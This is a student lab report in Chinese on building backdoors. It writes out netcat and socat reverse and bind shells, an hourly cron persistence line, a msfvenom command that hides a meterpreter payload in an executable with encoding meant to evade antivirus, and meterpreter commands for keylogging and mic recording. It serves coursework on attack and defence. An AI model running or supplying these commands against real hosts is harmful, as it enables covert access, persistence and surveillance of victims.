2017-2018-2 20155315《網絡對抗技術》Exp2:后門原理與實踐


實驗目的

學習建立一個后門連接。
教程

實驗內容

  • 使用netcat獲取主機操作Shell,cron啟動。
  • 使用socat獲取主機操作Shell, 任務計划啟動。
  • 使用MSF meterpreter(或其他軟件)生成可執行文件,利用ncat或socat傳送到主機並運行獲取主機Shell。
  • 使用MSF meterpreter(或其他軟件)生成獲取目標主機音頻、攝像頭、擊鍵記錄等內容,並嘗試提權。

實驗要求

  • 使用nc實現win,mac,Linux間的后門連接。
  • meterpreter的應用。
  • MSF POST 模塊的應用

實驗步驟

(一)netcat獲取主機操作Shell,cron啟動。

  • Cron是Linux下的定時任務,使用cron實現定時獲取Windows主機shell
  • 先測試看看Windows主機和Linux主機能不能互相獲取shell
  • nc需要的主要參數
-l :綁定並偵聽傳入的連接(一般用於服務端)
-p :偵聽的端口
-e :接收到的命令通過command(例如/bin/bash)執行
  • windows主機運行ncat.exe打開監聽端口
ncat.exe -l -p 5315
  • linux主機連接Windows主機的5315端口
nc 192.168.43.97 5315 -e /bin/sh
  • 這時候Windows就獲得了Linux的shell
  • 關閉原來的終端,Linux主機運行打開監聽端口,Windows主機連接監聽端口。
ncat.exe -e cmd.exe 192.168.102.130 5315
  • 運行結果:
  • 測試完成,在Linux中使用crontab增加定時條件:
    • crontab -e進入編輯模式
    • 選擇3. /usr/bin/vim.basic
    • 在最后一行添加定時條件30 * * * * /bin/netcat 192.168.43.97 5315 -e /bin/sh
  • 每小時30分的時候自啟動

(二)使用socat獲取主機操作Shell, 任務計划啟動。

  • Windows下載socat,在任務計划程序中新建一個任務
  • 將觸發器設置為當鎖定任何用戶的工作站時
  • 將程序或腳本設置為下載的socat文件,參數中添加``tcp-listen:5315 exec:cmd.exe,pty,stderr```
  • 在Windows中運行任務,在Linux中輸入socat -tcp:192.168.43.97:5315 就會連接到Windows主機。

(三)使用MSF meterpreter(或其他軟件)生成可執行文件,利用ncat或socat傳送到主機並運行獲取主機Shell。

  • 將Windows下的一個可執行文件生成一個后門文件
msfvenom -p windows/meterpreter/reverse_tcp -x ./ysf1.exe -e x86/shikata_ga_nai -i 5 -b ‘\x00’ LHOST=192.168.102.130 LPORT=5315 -f exe > 20155315_backdoor.exe

參數說明:

-p 使用的payload。payload翻譯為有效載荷,就是被運輸有東西。這里windows/meterpreter/reverse_tcp就是一段shellcode.
-x 使用的可執行文件模板,payload(shellcode)就寫入到這個可執行文件中。
-e 使用的編碼器,用於對shellcode變形,為了免殺。
-i 編碼器的迭代次數。如上即使用該編碼器編碼5次。
-b badchar是payload中需要去除的字符。
LHOST 是反彈回連的IP
LPORT 是回連的端口
-f 生成文件的類型
> 輸出到哪個文件
  • Linux使用nc將生成的文件發送給Windows
nc 192.168.102.1 5315 > 20155315_backdoor.exe
  • Windows使用nc接收文件
ncat.exe -l 5315 > 20155315_backdoor.exe
  • 在linux中運行msfconsole
  • 在msfconsole中設置參數
use exploit/multi/handler //進入handler模式
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.102.130
set LPORT 443
  • Linux運行exploit,Windows打開后門軟件,等一段時間就成功了。

(四)使用MSF 使用MSF meterpreter(或其他軟件)生成獲取目標主機音頻、擊鍵記錄等內容,並嘗試提權。

  • 獲取錄音:record_mic
  • 獲取截圖:screenshot
  • 獲取擊鍵記錄:keyscan_start顯示擊鍵記錄:keyscan_dump

實驗中遇到的問題

  • 一開始測試nc的時候,網絡連接出錯,使用ifconfig發現是Linux的網絡沒有連上,只有一個網卡,查找網上的資料修改配置之后就可以連接網絡了。
  • 在獲取攝像頭的時候出現了錯誤,查找資料尚未解決。

基礎問題回答

  • 例舉你能想到的一個后門進入到你系統中的可能方式?
    • 從網上下載的來路不明的文件可能被篡改
    • 通過中毒的移動設備進入計算機
  • 例舉你知道的后門如何啟動起來(win及linux)的方式?
    • Windows可以使用任務計划
    • linux可以使用cron定時觸發
  • Meterpreter有哪些給你映像深刻的功能?
    • 截取鍵盤擊鍵記錄:本來以為獲取密碼等等的輸入都要輸到特殊的軟件里,沒想到直接使用命令就可以獲取
    • 錄音:感覺很刺激又有點危險,在生活中要做好安全防御工作。
  • 如何發現自己有系統有沒有被安裝后門?
    • 使用殺毒軟件定期進行殺毒
    • 查看本機端口,查資料判斷是否有被異常開放的端口。

實驗總結

初步體驗了一下酷炫的操作,一開始運行nc的時候就特別興奮,一步步做下來感覺很棒,雖然對命令不是很熟悉,但是理解每一步的用處再將其實現就很有成就感。在提權和截取攝像頭的時候都出現了錯誤,用了網上的方法之后出現Exploit aborted due to failure: not-vulnerable: Windows 10 (Build 16299). is not vulnerable.表示win10可能不好攻擊。本次實驗用的后門還可以被安全軟件發現,之后學習了免殺的病毒之后就更難被發現了,雖然很酷炫,但是生活中更要注意對本機安全的保護。

參考資料


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM